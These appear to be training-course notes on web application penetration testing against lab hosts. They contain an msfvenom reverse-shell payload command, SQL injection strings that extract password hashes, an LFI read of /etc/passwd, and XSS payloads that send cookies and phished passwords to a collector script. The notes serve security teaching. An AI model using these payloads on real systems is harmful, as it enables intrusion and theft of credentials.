------------------------------------------------------------------------


Reverse Shell
-------------

---------------------------Type This------------------------------------
cd /home/sandiego/metasploit/
./msfvenom --list payloads | grep windows | grep shell | grep reverse_tcp
./msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.117.1 LPORT=4321 -b '\x00\x09\x0a\x0d\x20\x40' -f c -e x86/fsntenv_mov
------------------------------------------------------------------------


                           ##########################
----------- ############### # Day 3: Web App Testing ############### -----------
                           ##########################


##################################
# Basic: Web Application Testing #
##################################

Most people are going to tell you reference the OWASP Testing guide.
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.


The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.

   1. Does the website talk to a DB?
       - Look for parameter passing (ex: site.com/page.php?id=4)
       - If yes - try SQL Injection

   2. Can I or someone else see what I type?
       - If yes - try XSS

   3. Does the page reference a file?
       - If yes - try LFI/RFI

Let's start with some manual testing against 45.63.104.73


#######################
# Attacking PHP/MySQL #
#######################

Go to LAMP Target homepage
https://phpapp.infosecaddicts.com/


Clicking on the Acer Link:
https://phpapp.infosecaddicts.com/acre2.php?lap=acer

   - Found parameter passing (answer yes to question 1)
   - Insert ' to test for SQLI

---------------------------Type This-----------------------------------

https://phpapp.infosecaddicts.com/acre2.php?lap=acer'

-----------------------------------------------------------------------

Page returns the following error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''acer''' at line 1


In order to perform union-based sql injection - we must first determine the number of columns in this query.
We do this using the ORDER BY

---------------------------Type This-----------------------------------

https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 100-- +
-----------------------------------------------------------------------

Page returns the following error:
Unknown column '100' in 'order clause'


---------------------------Type This-----------------------------------

https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 50-- +
-----------------------------------------------------------------------

Page returns the following error:
Unknown column '50' in 'order clause'


---------------------------Type This-----------------------------------

https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 25-- +
-----------------------------------------------------------------------

Page returns the following error:
Unknown column '25' in 'order clause'


---------------------------Type This-----------------------------------

https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 12-- +
-----------------------------------------------------------------------

Page returns the following error:
Unknown column '12' in 'order clause'


---------------------------Type This-----------------------------------

https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 6-- +
-----------------------------------------------------------------------

---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns


Now we build out the union all select statement with the correct number of columns

Reference:
http://www.techonthenet.com/sql/union.php


---------------------------Type This-----------------------------------

https://phpapp.infosecaddicts.com/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
-----------------------------------------------------------------------


Now we negate the parameter value 'acer' by turning into the word 'null':
---------------------------Type This-----------------------------------

https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
-----------------------------------------------------------------------

We see that a 4 and a 5 are on the screen. These are the columns that will echo back data


Use a cheat sheet for syntax:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

---------------------------Type This-----------------------------------

https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j

https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j

https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +

https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +


https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a

-----------------------------------------------------------------------


########################
# Question I get a lot #
########################
Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.

Here is a good reference for it:
https://www.symantec.com/connect/blogs/mysql-injection-comments-comments

Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.


#########################
# File Handling Attacks #
#########################

Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)

---------------------------Type This-----------------------------------

https://phpapp.infosecaddicts.com/showfile.php?filename=about.txt

-----------------------------------------------------------------------


See if you can read files on the file system:
---------------------------Type This-----------------------------------

https://phpapp.infosecaddicts.com/showfile.php?filename=/etc/passwd
-----------------------------------------------------------------------

We call this attack a Local File Include or LFI.

Now let's find some text out on the internet somewhere:
https://www.gnu.org/software/hello/manual/hello.txt


Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:

---------------------------Type This-----------------------------------

https://phpapp.infosecaddicts.com/showfile.php?filename=https://www.gnu.org/software/hello/manual/hello.txt
-----------------------------------------------------------------------

#########################################################################################
# SQL Injection                                                                         #
# https://phpapp.infosecaddicts.com/1-Intro_To_SQL_Intection.pptx                       #
#########################################################################################


- Another quick way to test for SQLI is to remove the paramter value


#############################
# Error-Based SQL Injection #
#############################
---------------------------Type This-----------------------------------

https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--     NOTE: "N" - just means to keep going until you run out of databases
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--

-----------------------------------------------------------------------


#############################
# Union-Based SQL Injection #
#############################

---------------------------Type This-----------------------------------

https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 100--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 50--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 25--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 10--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 5--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 6--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 7--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 8--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 9--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
-----------------------------------------------------------------------

  We are using a union select statement because we are joining the developer's query with one of our own.
   Reference:
   http://www.techonthenet.com/sql/union.php
   The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
   It removes duplicate rows between the various SELECT statements.

   Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.

---------------------------Type This-----------------------------------

https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
-----------------------------------------------------------------------

   Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.

---------------------------Type This-----------------------------------

https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--

-----------------------------------------------------------------------


- Another way is to see if you can get the backend to perform an arithmetic function

---------------------------Type This-----------------------------------

https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=(2)
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=(4-2)
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=(4-1)


https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1=1--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1=2--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=1*1
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 >-1#
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1<99#
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1<>1#
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 2 != 3--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 &0#


https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and 1=1--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and 1=2--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and user='joe' and 1=1--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and user='dbo' and 1=1--

-----------------------------------------------------------------------


###############################
# Blind SQL Injection Testing #
###############################
Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER

3 - Total Characters
---------------------------Type This-----------------------------------

https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--      (Ok, the username is 3 chars long - it waited 10 seconds)
-----------------------------------------------------------------------

Let's go for a quick check to see if it's DBO

---------------------------Type This-----------------------------------

https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
-----------------------------------------------------------------------

Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.

---------------------------Type This-----------------------------------

D  - 1st Character
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--  (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)

B - 2nd Character
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds

O - 3rd Character
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds

-----------------------------------------------------------------------


################################
# Playing with session cookies #
################################

-----------------------------------------------------------------------
Step 1: Browse to the shopping cart page NewEgg.com
-------------------Browse to this webpage in Firefox------------------------------
https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
----------------------------------------------------------------------------------


Step 2: View the current session ID
---Type this over the shopping car URL in the address bar (don't paste it )---------
javascript:void(document.write(document.cookie))
------------------------------------------------------------------------------------

You should see your session cookie and if you don't try again in a different browser


Step 3: Go back to the shopping cart page (click the back button)
---------------------------------------------------------------------------------
https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
---------------------------------------------------------------------------------


Step 4: Now let's modify the session ID
---Type this over the shopping car URL in the address bar (don't paste it )---------
javascript:void(document.cookie="PHPSessionID=wow-this-is-fun")
------------------------------------------------------------------------------------


Step 5: Go back to the shopping cart page (click the back button)
---------------------------------------------------------------------------------
https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
---------------------------------------------------------------------------------


Step 6: View the current session ID
---Type this over the shopping car URL in the address bar (don't paste it )---------
javascript:void(document.write(document.cookie))
------------------------------------------------------------------------------------

-----------------------------------------------------------------------

#########################################################
# What is XSS                                           #
# https://phpapp.infosecaddicts.com/2-Intro_To_XSS.pptx #
#########################################################

OK - what is Cross Site Scripting (XSS)

1. Use Firefox to browse to the following location:
---------------------------Type This-----------------------------------

   https://phpapp.infosecaddicts.com/xss_practice/
-----------------------------------------------------------------------

   A really simple search page that is vulnerable should come up.


2. In the search box type:
---------------------------Type This-----------------------------------

   <script>alert('So this is XSS')</script>
-----------------------------------------------------------------------


   This should pop-up an alert window with your message in it proving XSS is in fact possible.
   Ok, click OK and then click back and go back to https://phpapp.infosecaddicts.com/xss_practice/


3. In the search box type:
---------------------------Type This-----------------------------------

   <script>alert(document.cookie)</script>
-----------------------------------------------------------------------


   This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
   Ok, click OK and then click back and go back to https://phpapp.infosecaddicts.com/xss_practice/

4. Now replace that alert script with:
---------------------------Type This-----------------------------------

   <script>document.location="https://phpapp.infosecaddicts.com/xss_practice/cookie_catcher.php?c="+document.cookie</script>
-----------------------------------------------------------------------


This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.


5. Now view the stolen cookie at:
---------------------------Type This-----------------------------------

   https://phpapp.infosecaddicts.com/xss_practice/cookie_stealer_logs.html
-----------------------------------------------------------------------


The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.


############################
# A Better Way To Demo XSS #
############################


Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.


Use Firefox to browse to the following location:
---------------------------Type This-----------------------------------

  https://phpapp.infosecaddicts.com/xss_practice/
-----------------------------------------------------------------------


Paste this in the search box
----------------------------


---------------------------Type This-----------------------------------

<script>
password=prompt('Your session is expired. Please enter your password to continue',' ');
document.write("<img src=\"https://phpapp.infosecaddicts.com/xss_practice/passwordgrabber.php?password=" +password+"\">");
</script>
-----------------------------------------------------------------------


Now view the stolen cookie at:
---------------------------Type This-----------------------------------

  https://phpapp.infosecaddicts.com/xss_practice/passwords.html

-----------------------------------------------------------------------


################################
# Web App Testing with Python3 #
################################


##############################
# Bannergrabbing a webserver #
##############################

---------------------------Type This-----------------------------------
nano bannergrab.py


---------------------------Paste This----------------------------------

#!/usr/bin/env python3
import sys
import socket

# Great reference: https://www.mkyong.com/python/python-3-typeerror-cant-convert-bytes-object-to-str-implicitly/

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("45.63.104.73", 80))
s.send(("GET / HTTP/1.1\r\n\r\n").encode())

#Convert response to bytes
response = b""
# or use encode()
#response = "".encode()

while True:
    data = s.recv(4096)
    response += data
    if not data:
        break
s.close()
print(response.decode())
----------------------------------------------------------------------


---------------------------Type This-----------------------------------
python3 bannergrab.py
-----------------------------------------------------------------------


########################################
# Testing availability of HTTP methods #
########################################

A  very  good  practice  for  a  penetration  tester  is  to  start  by  listing  the  various  available HTTP methods.
Following is a Python script with the help of which we can connect to the target web server and enumerate the available HTTP methods:

To begin with, we need to import the requests library:

---------------------------Type This-----------------------------------
python3
import requests
-----------------------------------------------------------------------

After importing the requests library,create an array of HTTP methods, which we are going to send. We will make use ofsome standard methods like 'GET', 'POST', 'PUT', 'DELETE', 'OPTIONS' and a non-standard method ‘TEST’ to check how a web server can handle the unexpected input.

---------------------------Type This-----------------------------------
method_list = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'TRACE','TEST']
----------------------------------------------------------------------------

The following line of code is the main loop of the script, which will send the HTTP packets to the web server and print the method and the status code.

---------------------------Type This-----------------------------------
for method in method_list:
   req = requests.request(method, 'https://www.google.com')
   print (method, req.status_code, req.reason)
------------------------------------------------------------------------


---------------------------Type This-----------------------------------
for method in method_list:
   req = requests.request(method, 'https://www.darkoperator.com')
   print (method, req.status_code, req.reason)
-----------------------------------------------------------------------


---------------------------Type This-----------------------------------
for method in method_list:
   req = requests.request(method, 'https://dvws1.infosecaddicts.com/dvws1/vulnerabilities/xst/xst.php')
   print (method, req.status_code, req.reason)
-----------------------------------------------------------------------


---------------------------Type This-----------------------------------
for method in method_list:
   req = requests.request(method, 'http://www.dybedu.com')
   print (method, req.status_code, req.reason)
-----------------------------------------------------------------------


The next line will test for the possibility of cross site tracing (XST) by sending the TRACE method.

---------------------------Type This-----------------------------------
if method == 'TRACE' and 'TRACE / HTTP/1.1' in req.text:
   print ('Cross Site Tracing(XST) is possible')
----------------------------------------------------------------------


*** Full code with example url: ***

---------------------------Type This-----------------------------------
nano xst.py


---------------------------Paste This----------------------------------
#!/usr/bin/env python3
import requests
method_list = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'TRACE','TEST']
for method in method_list:
   req = requests.request(method, 'https://dvws1.infosecaddicts.com/dvws1/vulnerabilities/xst/xst.php')
   print (method, req.status_code, req.reason)
if method == 'TRACE' and 'TRACE / HTTP/1.1' in req.text:
   print ('Cross Site Tracing(XST) is possible')

-------------------------------------------------------------------------


After running the above script for a particular web server, we will get 200 OK responses for a particular method accepted by the web server. We will get a 403 Forbidden response if the web server explicitly denies the method. Once we send the TRACE method for testing cross  site  tracing  (XST), we  will  get 405  Not  Allowed responses  from  the  web  server otherwise we will get the message ‘Cross Site Tracing(XST) is possible’.


---------------------------Type This-----------------------------------
python3 xst.py
-----------------------------------------------------------------------


##########################################
# Foot printing by checking HTTP headers #
##########################################


HTTP headers are found in both requests and responses from the web server. They also carry very important information about servers. That is why penetration tester is always interested in parsing information through HTTP headers. Following is a Python script for getting the information about headers of the web server:

To begin with, let us import the requests library:

------------------------
import requests
------------------------

We need to send a  GET request to the web  server. The following line  of code makes a simple GET request through the requests library.

---------------------------------------------
request = requests.get('enter the URL')
---------------------------------------------

Next, we will generate a list of headers about which you need the information.

---------------------------------------------------------------------------------------------------------------
header_list = ['Server', 'Date', 'Via', 'X-Powered-By', 'X-Country-Code', 'Connection', 'Content-Length']
---------------------------------------------------------------------------------------------------------------

Next is a try and except block.

---------------------------------------------------
for header in header_list:

   try:
      result = request.headers[header]
      print ('%s: %s' % (header, result))
   except Exception as err:
         print ('%s: No Details Found' % header)

---------------------------------------------------


*** Example Full Code: ***

---------------------------Type This-----------------------------------
nano headercheck.py


---------------------------Paste This----------------------------------
#!/usr/bin/env python3
import requests
request = requests.get('https://dvws1.infosecaddicts.com/dvws1/appinfo.php')
header_list = ['Server', 'Date', 'Via', 'X-Powered-By', 'X-Country-Code', 'Connection', 'Content-Length']
for header in header_list:
      try:
         result = request.headers[header]
         print ('%s: %s' % (header, result))
      except Exception as err:
               print ('%s: No Details Found' % header)
----------------------------------------------------------------------------------------------------------------


After running the above script for a particular web server, we will get the information about the  headers  provided  in  the  header  list.  If  there  will  be  no  information  for  a  particular header then it will give the message ‘No Details Found’.


---------------------------Type This-----------------------------------
python3 headercheck.py
-----------------------------------------------------------------------


##############################################
# Testing insecure web server configurations #
##############################################

We can use HTTP header information to test insecure web server configurations. In the following Python script, we are going to use try/except block to test insecure web server headers for number of URLs that are saved in a text file name websites.txt.
---------------------------Type This-----------------------------------
nano websites.txt

---------------------------Paste This----------------------------------
https://www.google.com
https://www.cnn.com
https://foxnews.com
https://phpapp.infosecaddicts.com/
https://aspdotnetapp.infosecaddicts.com/
https://dvws1.infosecaddicts.com/
-----------------------------------------------------------------------


---------------------------Type This-----------------------------------
nano insecure_config_check.py


---------------------------Paste This----------------------------------
#!/usr/bin/env python3

# Reference: https://www.keycdn.com/blog/http-security-headers

import requests
urls = open("websites.txt", "r")
for url in urls:
   url = url.strip()
   req = requests.get(url)
   print (url, 'report:')
   try:
      protection_xss = req.headers['X-XSS-Protection']
      if protection_xss != '1; mode=block':
         print ('X-XSS-Protection not set properly, it may be possible:', protection_xss)
   except:
      print ('X-XSS-Protection not set, it may be possible')
   try:
      options_content_type = req.headers['X-Content-Type-Options']
      if options_content_type != 'nosniff':
         print ('X-Content-Type-Options not set properly:', options_content_type)
   except:
      print ('X-Content-Type-Options not set')
   try:
      transport_security = req.headers['Strict-Transport-Security']
   except:
      print ('HSTS header not set properly, Man in the middle attacks is possible')
   try:
      content_security = req.headers['Content-Security-Policy']
      print ('Content-Security-Policy set:', content_security)
   except:
      print ('Content-Security-Policy missing')

-----------------------------------------------------------------------


---------------------------Type This-----------------------------------
python3 insecure_config_check.py
-----------------------------------------------------------------------


---------------------------Type This-----------------------------------
nano LFI-RFI.py


---------------------------Paste This----------------------------------

#!/usr/bin/env python3
print("\n### PHP LFI/RFI Detector ###")

import urllib.request, urllib.error, urllib.parse,re,sys

TARGET = "http://45.63.104.73/showfile.php?filename=about.txt"
RFIVULN = "https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt?"
TravLimit = 12

print("==> Testing for LFI vulns..")
TARGET = TARGET.split("=")[0]+"="               ## URL MANUPLIATION
for x in range(1,TravLimit):                    ## ITERATE THROUGH THE LOOP
   TARGET += "../"
   try:
       source = urllib.request.urlopen((TARGET+"etc/passwd")).read().decode() ## WEB REQUEST
   except urllib.error.URLError as e:
       print("$$$ We had an Error:",e)
       sys.exit(0)
   if re.search("root:x:0:0:",source):          ## SEARCH FOR TEXT IN SOURCE
       print("!! ==> LFI Found:",TARGET+"etc/passwd")
       break ## BREAK LOOP WHEN VULN FOUND

print("\n==> Testing for RFI vulns..")
TARGET = TARGET.split("=")[0]+"="+RFIVULN       ## URL MANUPLIATION
try:
   source = urllib.request.urlopen(TARGET).read().decode() ## WEB REQUEST
except urllib.error.URLError as e:
   print("$$$ We had an Error:",e)
   sys.exit(0)
if re.search("Hello world",source):             ## SEARCH FOR TEXT IN SOURCE
   print("!! => RFI Found:",TARGET)

print("\nScan Complete\n")                      ## DONE
----------------------------------------------------------------------


---------------------------Type This-----------------------------------
python3 LFI-RFI.py
-----------------------------------------------------------------------


#########################
# Setting up Burp Suite #
#########################
Download the latest free version of FoxyProxy at https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

Download the latest free version of Burp at https://portswigger.net/burp/freedownload

Be sure to download the appropriate version for your computer system/OS.

Download Burp Suite Community Edition v2.1.01 for Windows (64-bit), and double click on the exe to install, and desktop icon to run.

    - Click the "Proxy" tab
    - Click the "Options" sub tab
    - Click “Edit” in the “Proxy Listeners” section
    - In the “Edit proxy listener” pop up select “Binding Tab” select “loopback only”
    - In the same pop up make sure that the bind port is 8080
    - In the same pop up select the “Certificate” tab
    - Ensure that burp is configured to "generate CA-signed per-host certificates"

Open Firefox
    - Click "Tools"
    - Click “Options"
    - Click the "General" tab
    - Click the "Network settings" sub tab
    - Click the connection "settings" button
    - Click "manual proxy configuration"
        set it to 127.0.0.1 port 8080
        check "Use this proxy server for all protocols"
    - Remove both the "localhost, 127.0.0.1" text from the "No Proxy For:" line


Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CA-signed per-host certificates.

Visit any SSL-protected URL.

On the “This Connection is Untrusted” screen, click on “Add Exception”
Click "Get Certificate", then click "View".

In the “Details” tab, select the root certificate in the tree (PortSwigger CA).

Click "Export" and save the certificate as "BurpCert" on the Desktop.

Close Certificate Viewer dialog and click “Cancel” on the “Add Security Exception” dialog

 Firefox
    - Click "Tools"
    - Click “Options"
    - Go to "Privacy & Security"
    - go to “Certificates” sub tab
    - Click “View Certificates”

Click "Import" and select the certificate file that you previously saved.

On the "Downloading Certificate" dialog, check the box "Trust this CA to identify web sites", and click "OK".

Close all dialogs and restart Firefox


###############################################################
# Question 1: What is the process that you use when you test? #
###############################################################

Step 1: Automated Testing

Step 1a: Web Application vulnerability scanners
-----------------------------------------------
- Run two (2) unauthenticated vulnerability scans against the target
- Run two (2) authenticated vulnerability scans against the target with low-level user credentials
- Run two (2) authenticated vulnerability scans against the target with admin privileges

The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).

A good web application vulnerability scanner comparison website is here:
http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html


Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.

When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.


Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.


Also, be sure to save the scan results and logs. I usually provide this data to the customer.


Step 1b: Directory Brute Forcer
-------------------------------
I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).


Step 2: Manual Testing

Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).

Step 2a: Spider/Scan the entire site with Burp Suite
Save the spider and scan results. I usually provide this data to the customer as well.


Step 2b: Browse through the site using the 3 question method
Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.

Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.

Here is what I mean:
http://www.site.com/page.aspx?parametername=parametervalue

When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:

http://www.site.com/page.aspx?parametername=[ payload ]

You need to ensure that you send the payload this way, and like this below:

http://www.site.com/page.aspx?parametername=parametervalue[ payload ]

This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.


###########################################
# Question 2: How much fuzzing is enough? #
###########################################
There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.

Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.


Step 1: Ask yourself the 3 questions per page of the site.

Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)

Step 3: When you load your fuzz strings - use the following decision tree

    - Are the fuzz strings causing a default error message (example 404)?
        - If this is the case then it is most likely NOT vulnerable

    - Are the fuzz strings causing a WAF or LB custom error message?
        - If this is the case then you need to find an encoding method to bypass


    - Are the fuzz strings causing an error message that discloses the backend type?
        - If yes, then identify DB type and find correct syntax to successfully exploit
        - Some example strings that I use are:
            '
            "
            ()          <----- Take the parameter value and put it in parenthesis
            (5-1)       <----- See if you can perform an arithmetic function


    - Are the fuzz strings rendering executable code?
        - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
        - Some example strings that I use are:
            <b>hello</b>
            <u>hello</u>
            <script>alert(123);</script>
            <script>alert(xss);</script>
            <script>alert('xss');</script>
            <script>alert("xss");</script>


#######################
# Bug Bounty Programs #
#######################
https://medium.com/bugbountywriteup/bug-bounty-hunting-methodology-toolkit-tips-tricks-blogs-ef6542301c65


############################
# Bug Hunter's Methodology #
############################
https://www.youtube.com/watch?v=C4ZHAdI8o1w
https://www.youtube.com/watch?v=-FAjxUOKbdI

##################################
# Burp Extension Python Tutorial #
##################################

Reference link for this lab exercise:
https://laconicwolf.com/2018/04/13/burp-extension-python-tutorial/


- Initial setup

    Create a directory to store your extensions – I named mine burp-extensions
    Download the Jython standalone JAR file (http://www.jython.org/downloads.html) – Place into the burp-extensions folder
